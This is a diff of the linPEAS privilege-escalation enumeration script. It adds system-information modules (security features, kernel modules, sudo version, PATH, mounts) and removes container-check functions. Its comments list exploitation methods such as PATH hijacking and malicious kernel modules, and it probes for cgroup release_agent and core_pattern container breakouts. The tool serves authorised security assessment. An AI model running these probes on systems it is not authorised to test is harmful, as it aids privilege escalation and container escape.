    aa-status 2>&1 | sed "s,disabled,${SED_RED},"
 elif [ "$(command -v apparmor_status 2>/dev/null || echo -n '')" ]; then
    apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
 elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
    ls -d /etc/apparmor*
 else
    echo_not_found "AppArmor"
 fi
 #-- SY) AppArmor2
 print_list "AppArmor profile? .............. "$NC
 (cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
 #-- SY) LinuxONE
 print_list "is linuxONE? ................... "$NC
 ( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
 #-- SY) grsecurity
 print_list "grsecurity present? ............ "$NC
 ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
 #-- SY) PaX
 print_list "PaX bins present? .............. "$NC
 (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
 #-- SY) Execshield
 print_list "Execshield enabled? ............ "$NC
 (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
 #-- SY) SElinux
 print_list "SELinux enabled? ............... "$NC
 (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
 #-- SY) Seccomp
 print_list "Seccomp enabled? ............... "$NC
 ([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
 #-- SY) AppArmor
 print_list "User namespace? ................ "$NC
 if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
 #-- SY) cgroup2
 print_list "Cgroup2 enabled? ............... "$NC
 ([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
 #-- SY) Gatekeeper
 if [ "$MACPEAS" ]; then
    print_list "Gatekeeper enabled? .......... "$NC
    (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
    print_list "sleepimage encrypted? ........ "$NC
    (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
    print_list "XProtect? .................... "$NC
    (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
    print_list "SIP enabled? ................. "$NC
    csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
    print_list "Sealed Snapshot? ............. "$NC
    diskutil apfs list | grep "Snapshot Sealed" | awk -F: '{print $2}' | tr -d '[:space:]' | sed "s,Yes,${SED_GREEN}," | sed "s,No,${SED_RED}," || echo_not_found
    print_list "Sealed Snapshot (2nd)? ....... "$NC
    csrutil authenticated-root status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
    print_list "Connected to JAMF? ........... "$NC
    warn_exec jamf checkJSSConnection
    print_list "Connected to AD? ............. "$NC
    dsconfigad -show && echo "" || echo_no
 fi
 #-- SY) ASLR
 print_list "Is ASLR enabled? ............... "$NC
 ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
 if [ -z "$ASLR" ]; then
    echo_not_found "/proc/sys/kernel/randomize_va_space";
 else
    if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
    echo ""
 fi
 #-- SY) Printer
 print_list "Printer? ....................... "$NC
 (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
 #-- SY) Running in a virtual environment
 print_list "Is this a virtual machine? ..... "$NC
 hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
 if [ "$(command -v systemd-detect-virt 2>/dev/null || echo -n '')" ]; then
    detectedvirt=$(systemd-detect-virt)
    if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
 else
    if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/17_Kernel_Modules.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/17_Kernel_Modules.sh
@ -0,0 +1,62 @@
 # Title: System Information - Kernel Modules
 # ID: SY_Kernel_Modules
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for kernel module vulnerabilities and misconfigurations that could lead to privilege escalation:
 #   - Loaded kernel modules with known vulnerabilities
 #   - Kernel modules with weak permissions that could be modified
 #   - Ability to load kernel modules as unprivileged user
 #   - Missing kernel module signing requirements
 #   - Exploitation methods:
 #     * Vulnerable modules: Use known exploits for vulnerable kernel modules
 #     * Weak permissions: Modify kernel modules to inject malicious code
 #     * Module loading: Load malicious kernel modules to get root access
 #     * Common vulnerable modules: nf_tables, eBPF, overlayfs, etc.
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title
 # Global Variables: 
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 echo ""
 print_2title "Kernel Modules Information"
 # List loaded kernel modules
 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
    print_3title "Loaded kernel modules"
    if [ -f "/proc/modules" ]; then
        lsmod
    else
        echo_not_found "/proc/modules"
    fi
 fi
 # Check for kernel modules with weak permissions
 print_3title "Kernel modules with weak perms?"
 if [ -d "/lib/modules" ]; then
    find /lib/modules -type f -name "*.ko" -ls 2>/dev/null | grep -Ev "root\s+root" | sed -${E} "s,.*,${SED_RED},g"
    if [ $? -eq 1 ]; then
        echo "No kernel modules with weak permissions found"
    fi
 else
    echo_not_found "/lib/modules"
 fi
 echo ""
 # Check for kernel modules that can be loaded by unprivileged users
 print_3title "Kernel modules loadable? "
 if [ -f "/proc/sys/kernel/modules_disabled" ]; then
    if [ "$(cat /proc/sys/kernel/modules_disabled)" = "0" ]; then
        echo "Modules can be loaded" | sed -${E} "s,.*,${SED_RED},g"
    else
        echo "Modules cannot be loaded" | sed -${E} "s,.*,${SED_GREEN},g"
    fi
 else
    echo_not_found "/proc/sys/kernel/modules_disabled"
 fi
 echo "" 
--- a/linPEAS/builder/linpeas_parts/1_system_information/1_Operative_system.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/1_Operative_system.sh
@ -0,0 +1,42 @@
 # Title: System Information - Operative System
 # ID: SY_Operative_system
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for operating system information relevant to privilege escalation:
 #   - OS version and distribution
 #   - Kernel version
 #   - Architecture
 #   - Common vulnerable scenarios:
 #     * Outdated OS versions
 #     * Unpatched systems
 #     * Known vulnerable distributions
 #     * Architecture-specific vulnerabilities
 #   - Exploitation methods:
 #     * Version-specific exploits: Use known exploits for the OS version
 #     * Common attack vectors:
 #       - OS version exploits
 #       - Distribution-specific vulnerabilities
 #       - Architecture-specific exploits
 #       - Kernel version exploits
 #     * Exploit techniques:
 #       - Version-specific payloads
 #       - Distribution-specific attacks
 #       - Architecture-specific techniques
 #       - Kernel exploitation
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info, warn_exec
 # Global Variables: $MACPEAS, $kernelDCW_Ubuntu_Precise_1, $kernelB, $kernelDCW_Ubuntu_Precise_2, $kernelDCW_Ubuntu_Precise_3, $kernelDCW_Ubuntu_Precise_4, $kernelDCW_Ubuntu_Precise_5, $kernelDCW_Ubuntu_Precise_6, $kernelDCW_Rhel5_1, $kernelDCW_Rhel5_2, $kernelDCW_Rhel5_3, $kernelDCW_Rhel6_1, $kernelDCW_Rhel6_2, $kernelDCW_Rhel6_3, $kernelDCW_Rhel6_4, $kernelDCW_Rhel7, $kernelDCW_Ubuntu_Trusty_1, $kernelDCW_Ubuntu_Trusty_2, $kernelDCW_Ubuntu_Trusty_3, $kernelDCW_Ubuntu_Trusty_4, $kernelDCW_Ubuntu_Xenial
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Operative system"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits"
 (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
 warn_exec lsb_release -a 2>/dev/null
 if [ "$MACPEAS" ]; then
    warn_exec system_profiler SPSoftwareDataType
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/2_Sudo_version.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/2_Sudo_version.sh
@ -0,0 +1,36 @@
 # Title: System Information - Sudo Version
 # ID: SY_Sudo_version
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for sudo vulnerabilities and misconfigurations that could lead to privilege escalation:
 #   - Vulnerable sudo versions with known exploits
 #   - Common vulnerable versions and CVEs:
 #     * CVE-2021-3156 (Baron Samedit): Heap overflow in sudo
 #     * CVE-2021-23239: Potential privilege escalation
 #     * CVE-2021-23240: Potential privilege escalation
 #     * CVE-2021-23241: Potential privilege escalation
 #   - Exploitation methods:
 #     * Version exploits: Use known exploits for vulnerable sudo versions
 #     * Common targets: sudo < 1.9.5p2 (Baron Samedit)
 #     * Exploit techniques:
 #       - Heap overflow exploitation
 #       - Race conditions
 #       - Memory corruption
 #       - Command injection
 # License: GNU GPL
 # Version: 1.0 
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $sudovB
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Sudo version"
 if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version"
 sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
 else echo_not_found "sudo"
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/3_USBCreator.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/3_USBCreator.sh
@ -0,0 +1,47 @@
 # Title: System Information - USBCreator
 # ID: SY_USBCreator
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for USBCreator vulnerabilities that could lead to privilege escalation:
 #   - Vulnerable policykit-desktop-privileges versions
 #   - Common vulnerable versions:
 #     * policykit-desktop-privileges < 0.21
 #   - Exploitation methods:
 #     * D-Bus command injection through USBCreator
 #     * Abuse of policykit privileges
 #     * Common attack vectors:
 #       - D-Bus method call injection
 #       - PolicyKit authentication bypass
 #       - Command execution through USB creation
 #     * Exploit techniques:
 #       - D-Bus method spoofing
 #       - PolicyKit privilege escalation
 #       - USB device creation abuse
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $DEBUG
 # Initial Functions:
 # Generated Global Variables: $pc_version, $pc_length, $pc_major, $pc_minor
 # Fat linpeas: 0
 # Small linpeas: 0
 if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
    print_2title "USBCreator"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.html"
    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
    if [ -z "$pc_version" ]; then
        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
    fi
    if [ -n "$pc_version" ]; then
        pc_length=${#pc_version}
        pc_major=$(echo "$pc_version" | cut -d. -f1)
        pc_minor=$(echo "$pc_version" | cut -d. -f2)
        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
        fi
    fi
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/4_Path.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/4_Path.sh
@ -0,0 +1,42 @@
 # Title: System Information - Path
 # ID: SY_Path
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for PATH environment misconfigurations that could lead to privilege escalation:
 #   - Writable directories in PATH
 #   - Current directory (.) in PATH
 #   - Common vulnerable scenarios:
 #     * Writable system directories in PATH
 #     * Current directory in PATH
 #     * Relative paths in PATH
 #   - Exploitation methods:
 #     * PATH hijacking: Place malicious executables in writable PATH directories
 #     * Common attack vectors:
 #       - Replace common binaries (ls, cat, etc.)
 #       - Create malicious executables with common names
 #       - Abuse sudo PATH inheritance
 #     * Exploit techniques:
 #       - Binary replacement
 #       - Symbolic link attacks
 #       - PATH manipulation
 #       - Sudo PATH abuse
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $DEBUG, $IAMROOT, $OLDPATH, $PATH, $Wfolders
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "PATH"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses"
 if ! [ "$IAMROOT" ]; then
    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
 fi
 if [ "$DEBUG" ]; then
     echo "New path exported: $PATH"
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/5_Date.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/5_Date.sh
@ -0,0 +1,39 @@
 # Title: System Information - Date
 # ID: SY_Date
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for system date and uptime information relevant to privilege escalation:
 #   - System uptime
 #   - Last boot time
 #   - System time
 #   - Common vulnerable scenarios:
 #     * Long uptime (unpatched systems)
 #     * Time-based vulnerabilities
 #     * Scheduled tasks timing
 #     * Cron job timing
 #   - Exploitation methods:
 #     * Timing attacks: Abuse time-based vulnerabilities
 #     * Common attack vectors:
 #       - Race conditions
 #       - Time-of-check to time-of-use (TOCTOU)
 #       - Scheduled task abuse
 #       - Cron job timing
 #     * Exploit techniques:
 #       - Race condition exploitation
 #       - TOCTOU attacks
 #       - Scheduled task manipulation
 #       - Cron job abuse
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, warn_exec
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 print_2title "Date & uptime"
 warn_exec date 2>/dev/null
 warn_exec uptime 2>/dev/null
 echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/6_CPU_info.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/6_CPU_info.sh
@ -0,0 +1,40 @@
 # Title: System Information - CPU info
 # ID: SY_CPU_info
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for CPU information relevant to privilege escalation:
 #   - CPU architecture
 #   - CPU features
 #   - CPU vulnerabilities
 #   - Common vulnerable scenarios:
 #     * CPU-specific vulnerabilities (Spectre, Meltdown, etc.)
 #     * Missing CPU mitigations
 #     * Architecture-specific exploits
 #     * CPU feature abuse
 #   - Exploitation methods:
 #     * CPU-based attacks: Abuse CPU vulnerabilities
 #     * Common attack vectors:
 #       - Spectre/Meltdown exploitation
 #       - CPU feature abuse
 #       - Architecture-specific attacks
 #       - CPU timing attacks
 #     * Exploit techniques:
 #       - Side-channel attacks
 #       - CPU feature exploitation
 #       - Architecture-specific techniques
 #       - CPU timing exploitation
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, warn_exec
 # Global Variables: $DEBUG, $EXTRA_CHECKS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
    print_2title "CPU info"
    warn_exec lscpu 2>/dev/null
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/7_Mounts.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/7_Mounts.sh
@ -0,0 +1,41 @@
 # Title: System Information - Mounts
 # ID: SY_Mounts
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for mount point misconfigurations that could lead to privilege escalation:
 #   - Unmounted filesystems
 #   - Mount point permissions
 #   - Mount options
 #   - Common vulnerable scenarios:
 #     * Writable mount points
 #     * Insecure mount options
 #     * Unmounted sensitive filesystems
 #     * Shared mount points
 #   - Exploitation methods:
 #     * Mount point abuse: Exploit mount misconfigurations
 #     * Common attack vectors:
 #       - Mount point modification
 #       - Filesystem remounting
 #       - Mount option abuse
 #       - Shared mount exploitation
 #     * Exploit techniques:
 #       - Mount point manipulation
 #       - Filesystem remounting
 #       - Mount option exploitation
 #       - Shared mount abuse
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $DEBUG, $mountG, $mountpermsB, $mountpermsG, $notmounted, $Wfolders, $mounted
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
    print_2title "Unmounted file-system?"
    print_info "Check if you can mount umounted devices"
    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/8_Disks.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/8_Disks.sh
@ -0,0 +1,47 @@
 # Title: System Information - Disks
 # ID: SY_Disks
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for disk information and misconfigurations that could lead to privilege escalation:
 #   - Available disks
 #   - Disk permissions
 #   - SMB shares
 #   - Common vulnerable scenarios:
 #     * Writable disks
 #     * Insecure SMB shares
 #     * Exposed disk devices
 #     * Shared storage
 #   - Exploitation methods:
 #     * Disk access abuse: Exploit disk misconfigurations
 #     * Common attack vectors:
 #       - Disk device modification
 #       - SMB share abuse
 #       - Storage device access
 #       - Shared disk exploitation
 #     * Exploit techniques:
 #       - Disk device manipulation
 #       - SMB share exploitation
 #       - Storage device abuse
 #       - Shared disk access
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, warn_exec
 # Global Variables: $DEBUG
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ -d "/dev" ] || [ "$DEBUG" ] ; then
    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
    echo ""
 fi
 if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
    print_2title "Mounted SMB Shares"
    warn_exec smbutil statshares -a
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/9_Disks_extra.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/9_Disks_extra.sh
@ -0,0 +1,47 @@
 # Title: System Information - Disks Extra
 # ID: SY_Disks_extra
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Check for additional disk information and system resources relevant to privilege escalation:
 #   - Disk utilization
 #   - System resources
 #   - Storage statistics
 #   - Common vulnerable scenarios:
 #     * Low disk space (potential for race conditions)
 #     * Resource exhaustion
 #     * Storage device misconfigurations
 #     * System resource abuse
 #   - Exploitation methods:
 #     * Resource-based attacks: Abuse system resources
 #     * Common attack vectors:
 #       - Disk space exhaustion
 #       - Resource starvation
 #       - Storage device abuse
 #       - System resource manipulation
 #     * Exploit techniques:
 #       - Resource exhaustion
 #       - Storage device exploitation
 #       - System resource abuse
 #       - Resource-based attacks
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, warn_exec
 # Global Variables: $DEBUG, $EXTRA_CHECKS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
    print_2title "Mounted disks information"
    warn_exec diskutil list
    echo ""
 fi
 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
    print_2title "System stats"
    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
    warn_exec free 2>/dev/null
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/2_container.sh
+++ b/linPEAS/builder/linpeas_parts/2_container.sh
@ -1,418 +0,0 @@
 ###########################################
 #---------) Container functions (---------#
 ###########################################
 containerCheck() {
  inContainer=""
  containerType="$(echo_no)"
  # Are we inside docker?
  if [ -f "/.dockerenv" ] ||
    grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
    grep -qai docker /proc/self/cgroup  2>/dev/null ||
    [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then
    inContainer="1"
    containerType="docker\n"
  fi
  # Are we inside kubenetes?
  if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
    grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
    inContainer="1"
    if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
    else containerType="kubernetes\n"
    fi
  fi
  # Inside concourse?
  if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then
    inContainer="1"
    if [ "$containerType" ]; then 
      containerType="$containerType (concourse)\n"
    fi
  fi
  # Are we inside LXC?
  if env | grep "container=lxc" -qa 2>/dev/null ||
      grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
    inContainer="1"
    containerType="lxc\n"
  fi
  # Are we inside podman?
  if env | grep -qa "container=podman" 2>/dev/null ||
      grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
    inContainer="1"
    containerType="podman\n"
  fi
  # Check for other container platforms that report themselves in PID 1 env
  if [ -z "$inContainer" ]; then
    if grep -a 'container=' /proc/1/environ 2>/dev/null; then
      inContainer="1"
      containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n"
    fi
  fi
 }
 inDockerGroup() {
  DOCKER_GROUP="No"
  if groups 2>/dev/null | grep -q '\bdocker\b'; then
    DOCKER_GROUP="Yes"
  fi
 }
 checkDockerRootless() {
  DOCKER_ROOTLESS="No"
  if docker info 2>/dev/null|grep -q rootless; then
    DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
  fi
 }
 enumerateDockerSockets() {
  dockerVersion="$(echo_not_found)"
  if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
    SEARCHED_DOCKER_SOCKETS="1"
    for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
      if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
        if echo "$int_sock" | grep -Eq "docker"; then
          dock_sock="$int_sock"
          echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
          echo "Docker enummeration:"
          docker_enumerated=""
          if [ "$(command -v curl)" ]; then
            sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)"
            dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
            echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
            if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
          fi
          if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then
            sockInfoResponse="$(docker info)"
            dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
            printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
          fi
        else
          echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g"
        fi
      else
        echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g"
      fi
    done
  fi
 }
 checkDockerVersionExploits() {
  if echo "$dockerVersion" | grep -iq "not found"; then
    VULN_CVE_2019_13139="$(echo_not_found)"
    VULN_CVE_2019_5736="$(echo_not_found)"
    return
  fi
  VULN_CVE_2019_13139="$(echo_no)"
  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
    VULN_CVE_2019_13139="Yes"
  fi
  VULN_CVE_2019_5736="$(echo_no)"
  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
    VULN_CVE_2019_5736="Yes"
  fi
 }
 checkContainerExploits() {
  VULN_CVE_2019_5021="$(echo_no)"
  if [ -f "/etc/alpine-release" ]; then
    alpineVersion=$(cat /etc/alpine-release)
    if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
      VULN_CVE_2019_5021="Yes"
    fi
  fi
 }
 checkCreateReleaseAgent(){
  cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys
  do
      if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
          release_agent_breakout2="Yes (unshare with $subsys)";
          rm -rf /tmp/cgroup_3628d4
          break
      fi
  done
 }
 checkProcSysBreakouts(){
  dev_mounted="No"
  if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
    dev_mounted="Yes";
  fi
  proc_mounted="No"
  if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
    proc_mounted="Yes";
  fi
  run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
  if ! [ "$run_unshare" = "Yes" ]; then
    run_unshare="No"
  fi
  if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then 
    release_agent_breakout1="Yes"
  else 
    release_agent_breakout1="No"
  fi
  release_agent_breakout2="No"
  mkdir /tmp/cgroup_3628d4
  mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
  if [ $? -eq 0 ]; then 
    release_agent_breakout2="Yes"; 
    rm -rf /tmp/cgroup_3628d4
  else 
    mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null
    if [ $? -eq 0 ]; then 
      release_agent_breakout2="Yes"; 
      rm -rf /tmp/cgroup_3628d4
    else 
      checkCreateReleaseAgent
    fi
  fi
  rm -rf /tmp/cgroup_3628d4 2>/dev/null
  core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)"
  modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)"
  panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
  panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)"
